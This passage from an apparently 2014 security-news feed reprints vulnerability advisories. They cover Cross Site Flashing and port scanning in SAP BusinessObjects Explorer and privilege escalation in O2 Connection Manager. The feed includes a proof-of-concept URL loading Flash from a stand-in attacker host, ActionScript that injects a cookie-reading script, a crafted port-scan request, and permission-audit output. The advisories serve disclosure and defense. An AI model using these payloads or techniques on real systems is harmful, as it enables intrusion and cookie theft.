configUrl. This requires the victim to be logged and the attacker needs
to know the /webres/ URL, which is known as soon as the attacker is in
possession of valid credentials. The configuration file specified in
the configURL parameter may reside on a foreign host. The
configuration file itself may contain URLs of further Flash files
residing on a foreign domain. If successful, the victim loads foreign
Flash files, which leads to Cross Site Flashing. The example below
loads a Flash file, which injects JavaScript into the DOM of the
originating domain.

URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml

Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml
package
{
import flash.display.Sprite;
import flash.events.Event;
import flash.external.ExternalInterface;

public class Main extends Sprite
{
public function Main():void
{
ExternalInterface.call("document.write",
"<script>alert(document.cookie)</script>");
}
}
}

Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:
<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"
p:codebase="plugins/">
<p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
<p:bundles>
<p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
<p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>
<p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>
<p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>
[CUT BY COMPASS]

Timeline:
---------
2013-06-06: Discovery by Stefan Horlacher
2013-06-26: Initial vendor notification
2013-12-10: Vendor releases patch and SAP Security Note 1908647
2014-10-10: Disclosure of the advisory

References:
-----------
[0] https://service.sap.com/sap/support/notes/1908647
[1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project

↧

Automated configuration analysis for Mozilla's TLS guidelines

October 10, 2014, 2:44 am

≫ Next: SAP Security Note 1908562 - Port scanning in BusinessObjects Explorer

≪ Previous: SAP Security Note 1908647 - Cross Site Flashing in BusinessObjects Explorer

Last week, we updated Mozilla's Server Side TLS guidelines to add a third recommended configurations. Each configuration maps to a target compatibility level

more here............https://jve.linuxwall.info/blog/index.php?post/2014/10/09/Automated-configuration-analysis-for-Mozilla-s-TLS-guidelines

↧

SAP Security Note 1908562 - Port scanning in BusinessObjects Explorer

October 10, 2014, 2:44 am

≫ Next: Rustock.B Live Debugging - SwishDbgExt, SysecLabs script.

≪ Previous: Automated configuration analysis for Mozilla's TLS guidelines

#######################################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#######################################################################
#
# Product: BusinessObjects Explorer
# Vendor: SAP AG
# Subject: Potential information disclosure relating to SBOP Explorer
# Risk: Medium
# Effect: Remotely exploitable
# Author: Stefan Horlacher
# Date: 2014-10-10
# SAP Security Note: 1908562 [0]
#
#######################################################################

Abstract:
-------------
BusinessObjects Explorer does not validate the user defined inputs of
parameter CMS name, which consists of a host name and port number.
This can be used to perform a port scan within the network range where
the BusinessObject Explorer server is located.
This vulnerability could be triggered as unauthenticated user.

Affected:
---------
Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer

Technical Description:
----------------------
It is possible to disable that a user is able to choose the CMS feature.
Nonetheless, the client sends this value to the server where it gets
interpreted. This allows abusing this feature for port scanning
purposes as it is possible to determine a port's state from the
response time.

A request with a valid host and open port will get a time-out response
after 10 seconds while a request to an invalid host name or closed
port will return an error in less than 500 milliseconds.

URL: /explorer/polestar_xml.jsp
Request extract:
POST /explorer/polestar_xml.jsp HTTP/1.1
[CUT BY COMPASS]
Content-Length: 187
xmlParameter=<dataDiscovery><request><logon user="[CUT BY COMPASS]" password="[CUT BY
COMPASS]" cms="[CUT BY COMPASS: HOST_AND_PORT_HERE]" authentication="[CUT BY COMPASS]"
locale="en_US" guid=""/></request></dataDiscovery>

Response extract:
HTTP/1.1 200 OK
[CUT BY COMPASS]
<?xml version="1.0" encoding="UTF-8"?><dataDiscovery>
<response>
<status code="ERROR" message="PS_10001_INVALID_CREDENTIALS_LOGON">
<detail message="Server [CUT BY COMPASS] not found or server may be down (FWM 01003)"/>
</status>
</response>
</dataDiscovery>

Timeline:
---------
2013-06-06: Discovery by Stefan Horlacher
2013-06-26: Initial vendor notification
2013-12-10: Vendor releases patch and SAP Security Note 1908562
2014-10-10: Disclosure of the advisory

References:
-----------
[0] https://service.sap.com/sap/support/notes/1908562

↧

Rustock.B Live Debugging - SwishDbgExt, SysecLabs script.

October 10, 2014, 6:48 am

≫ Next: Telefonica O2 Connection Manager 3.4 Local Privilege Escalation

≪ Previous: SAP Security Note 1908562 - Port scanning in BusinessObjects Explorer

Here we are, part two! I thought rather than doing a live debugging of runtime2 as I discussed in my last rootkit debugging post, I'd debug a different rootkit. I chose Rustock.B (PE386) as it's a pretty notorious rootkit, and in my opinion is a lot of fun to debug. It's always a great learning experience to debug, reverse, and research things for yourself as well. I have a map of rootkits I want to debug and reverse as the weeks go by, so expect many more of these.

more here..........http://bsodanalysis.blogspot.com/2014/10/rootkit-debugging-rustockb-live.html

↧

Telefonica O2 Connection Manager 3.4 Local Privilege Escalation

October 10, 2014, 8:50 am

≫ Next: Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation

≪ Previous: Rustock.B Live Debugging - SwishDbgExt, SysecLabs script.

Telefonica O2 Connection Manager 3.4 Local Privilege Escalation Vulnerability

Vendor: Telefonica S.A.
Product web page: http://www.telefonica.com | http://www.o2.co.uk
Affected version: 3.4.R1 (108)

Summary: O2 Connection Manager will help you to manage your internet
connections by getting you connected to the fastest available network.
Automatically connect you to the fastest available network including
your home broadband if you have a wireless router.

Desc: O2 Connection Manager suffers from an elevation of privileges
vulnerability which can be used by a simple user that can change the
executable files with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'F' flag (Full) for 'Everyone'
group, making the entire directory 'O2 Connection Manager' and its
files and sub-dirs world-writable.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2014-5199
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5199.php

22.09.2014

---

==========================================================================

Arguments Used:
Filename = "C:\Program Files (x86)\O2CM-CE\O2 Connection Manager"

**************************************************************************
Directory: C:\Program Files (x86)\O2CM-CE\O2 Connection Manager

Permissions:
Type Username Permissions Inheritance

Allowed \Everyone Full Control This Folder Only
Allowed \Everyone Special (Unknown) Files Only
Allowed BUILTIN\Administrators Special (DCBA654321) This Folder and Files
Allowed NT SERVICE\TrustedInsta Full Control This Folder Only
Allowed NT SERVICE\TrustedInsta Special (Unknown) Subfolders only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed NT AUTHORITY\SYSTEM Special (Unknown) Subfolders and Files
Allowed BUILTIN\Administrators Full Control This Folder Only
Allowed BUILTIN\Administrators Special (Unknown) Subfolders and Files
Allowed BUILTIN\Users Read and Execute This Folder Only
Allowed BUILTIN\Users Special (Unknown) Subfolders and Files
Allowed \CREATOR OWNER Special (Unknown) Subfolders and Files

No Auditing set

Owner: NT AUTHORITY\SYSTEM
**************************************************************************

Operation Complete
Elapsed Time: 0,234375 seconds.

==========================================================================

Arguments Used:
Filename = "C:\Program Files (x86)\O2CM-CE\O2 Connection Manager\tscui.exe"

**************************************************************************
File: C:\Program Files (x86)\O2CM-CE\O2 Connection Manager\tscui.exe

Permissions:
Type Username Permissions Inheritance

Allowed \Everyone Full Control This Folder Only
Allowed BUILTIN\Administrators Special (DCBA654321) This Folder Only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed BUILTIN\Administrators Full Control This Folder Only
Allowed BUILTIN\Users Read and Execute This Folder Only

No Auditing set

Owner: NT AUTHORITY\SYSTEM
**************************************************************************

Operation Complete
Elapsed Time: 0,125 seconds.

==========================================================================

C:\Program Files (x86)\O2CM-CE\O2 Connection Manager>icacls *.exe |findstr "Everyone:(I)(F)"
Elevate.exe Everyone:(I)(F)
locSrch.exe Everyone:(I)(F)
md5sum.exe Everyone:(I)(F)
patch.exe Everyone:(I)(F)
ProfileImp.exe Everyone:(I)(F)
SupportAssistant.exe Everyone:(I)(F)
tscui.exe Everyone:(I)(F)
vcredist_x86.exe Everyone:(I)(F)
WifiProfileImportTool.exe Everyone:(I)(F)
XAU.exe Everyone:(I)(F)

C:\Program Files (x86)\O2CM-CE\O2 Connection Manager>

==========================================================================

//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

↧

Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation

October 10, 2014, 8:50 am

≫ Next: Paper: A Decentralized Public Key Infrastructure with Identity Retention

≪ Previous: Telefonica O2 Connection Manager 3.4 Local Privilege Escalation

Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation

Vendor: Telefonica S.A.
Product web page: http://www.telefonica.com | http://www.o2.co.uk
Affected version: 8.7.6.792

Summary: O2 Connection Manager will help you to manage your internet
connections by getting you connected to the fastest available network.
Automatically connect you to the fastest available network including
your home broadband if you have a wireless router.

Desc: The O2 Connection Manager's service suffers from an unquoted
search path issue impacting the Import WiFi 'TGCM_ImportWiFiSvc'
service for Windows. This could potentially allow an authorized but
non-privileged local user to execute arbitrary code with elevated
privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path
undetected by the OS or other security applications where it could
potentially be executed during application startup or reboot. If
successful, the local user’s code would execute with the elevated
privileges of the application.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2014-5200
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5200.php

22.09.2014

---

C:\>sc qc TGCM_ImportWiFiSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TGCM_ImportWiFiSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TGCM_ImportWiFiSvc
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\>icacls "C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe"
C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\>

---

//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

↧

Paper: A Decentralized Public Key Infrastructure with Identity Retention

October 10, 2014, 11:11 am

≫ Next: Dairy Queen Customer Data Compromised by Backoff Malware

≪ Previous: Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation

Public key infrastructures (PKIs) enable users to look up and verify one another’s public
keys based on identities. Current approaches to PKIs are vulnerable because they do not offer
sufficiently strong guarantees of identity retention; that is, they do not effectively prevent one
user from registering a public key under another’s already-registered identity. In this paper, we
leverage the consistency guarantees provided by cryptocurrencies such as Bitcoin and Namecoin
to build a PKI that ensures identity retention. Our system, called Certcoin, has no central
authority and thus requires the use of secure distributed dictionary data structures to provide
efficient support for key lookup.

more here..........http://eprint.iacr.org/2014/803.pdf

↧